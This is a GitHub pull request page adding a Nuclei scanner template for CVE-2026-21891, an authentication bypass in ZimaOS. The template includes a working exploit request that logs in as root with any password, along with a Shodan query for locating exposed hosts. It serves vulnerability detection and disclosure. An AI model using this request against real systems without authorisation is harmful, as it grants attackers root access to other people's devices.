Skip to content

Create CVE-2026-21891.yaml for ZimaOS auth bypass #15302

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
pussycat0x merged 1 commit into from
Feb 12, 2026
Merged

Create CVE-2026-21891.yaml for ZimaOS auth bypass #15302

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
64 changes: 64 additions & 0 deletions http/cves/2026/CVE-2026-21891.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@
id: CVE-2026-21891

info:
name: ZimaOS - Authentication Bypass
author: DhiyaneshDk
severity: critical
description: |
ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames.
impact: |
Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.
remediation: |
Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.
reference:
- https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4
- https://nvd.nist.gov/vuln/detail/CVE-2026-21891
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
cvss-score: 9.4
cve-id: CVE-2026-21891
cwe-id: CWE-287
epss-score: 0.00059
epss-percentile: 0.18386
cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"ZimaOS"
product: zimaos
vendor: zimaspace
tags: cve,cve2026,zimaos,auth-bypass,broken-auth

http:
- raw:
- |
POST /v1/users/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/

{
"username": "root",
"password": "anything"
}

matchers-condition: and
matchers:
- type: word
part: body
words:
- "success"
- "username"
- "created_at"
condition: and

- type: word
part: content_type
words:
- "application/json"

- type: status
status:
- 200
Loading